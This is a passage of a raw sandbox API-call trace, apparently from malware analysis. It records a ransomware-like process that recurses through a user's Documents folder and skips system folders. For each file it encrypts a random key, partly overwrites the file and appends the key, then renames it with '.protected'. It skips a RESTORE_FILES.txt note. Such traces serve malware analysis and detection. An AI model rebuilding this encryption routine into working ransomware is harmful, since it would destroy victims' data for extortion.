[0091.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx.protected")) returned 1 [0091.348] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Windows") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Program Files") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Program Files (x86)") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="$Recycle.bin") returned 1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="System Volume Information") returned -1 [0091.348] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.348] StrStrIW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".protected") returned 0x0 [0091.348] lstrcmpW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.349] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".txt") returned 0x0 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".rar") returned 0x0 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".zip") returned 0x0 [0091.349] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.350] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.350] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.350] CloseHandle (hObject=0xb4) returned 1 [0091.350] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx.protected") returned 77 [0091.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx.protected")) returned 1 [0091.351] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Windows") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Program Files") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Program Files (x86)") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="$Recycle.bin") returned 1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="System Volume Information") returned -1 [0091.351] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrIW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".protected") returned 0x0 [0091.351] lstrcmpW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.351] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.351] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".txt") returned 0x0 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".rar") returned 0x0 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".zip") returned 0x0 [0091.351] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.352] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.352] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.352] CloseHandle (hObject=0xb4) returned 1 [0091.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf.protected") returned 78 [0091.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf.protected")) returned 1 [0091.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Windows") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Program Files") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Program Files (x86)") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="$Recycle.bin") returned 1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="System Volume Information") returned -1 [0091.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.353] StrStrIW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".protected") returned 0x0 [0091.353] lstrcmpW (lpString1="G9rIfRF_pwUh.doc", lpString2="RESTORE_FILES.txt") returned -1 [0091.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".txt") returned 0x0 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".rar") returned 0x0 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".zip") returned 0x0 [0091.354] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.354] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.354] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.354] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.355] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.355] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.355] CloseHandle (hObject=0xb4) returned 1 [0091.355] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc.protected") returned 70 [0091.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc.protected")) returned 1 [0091.356] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Windows") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Program Files") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Program Files (x86)") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="$Recycle.bin") returned 1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="System Volume Information") returned -1 [0091.356] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.356] StrStrIW (lpFirst="L cM5A.pdf", lpSrch=".protected") returned 0x0 [0091.356] lstrcmpW (lpString1="L cM5A.pdf", lpString2="RESTORE_FILES.txt") returned -1 [0091.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".txt") returned 0x0 [0091.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".rar") returned 0x0 [0091.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".zip") returned 0x0 [0091.357] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.357] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.357] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.357] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.357] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.358] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.358] CloseHandle (hObject=0xb4) returned 1 [0091.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf.protected") returned 64 [0091.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf.protected")) returned 1 [0091.358] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.358] lstrcmpiW (lpString1="Mxlov", lpString2="Windows") returned -1 [0091.358] lstrcmpiW (lpString1="Mxlov", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov") returned 49 [0091.359] lstrcmpW (lpString1="Mxlov", lpString2=".") returned 1 [0091.359] lstrcmpW (lpString1="Mxlov", lpString2="..") returned 1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\*") returned 51 [0091.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.359] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\.") returned 51 [0091.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.359] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\..") returned 52 [0091.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.359] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.359] StrStrIW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".protected") returned 0x0 [0091.359] lstrcmpW (lpString1="0arOslpnViit7wH.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".txt") returned 0x0 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".rar") returned 0x0 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".zip") returned 0x0 [0091.360] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.360] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.360] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.361] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.361] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.361] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.361] CloseHandle (hObject=0xd4) returned 1 [0091.361] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt.protected") returned 79 [0091.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt.protected")) returned 1 [0091.362] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Windows") returned -1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Program Files") returned -1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Program Files (x86)") returned -1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="$Recycle.bin") 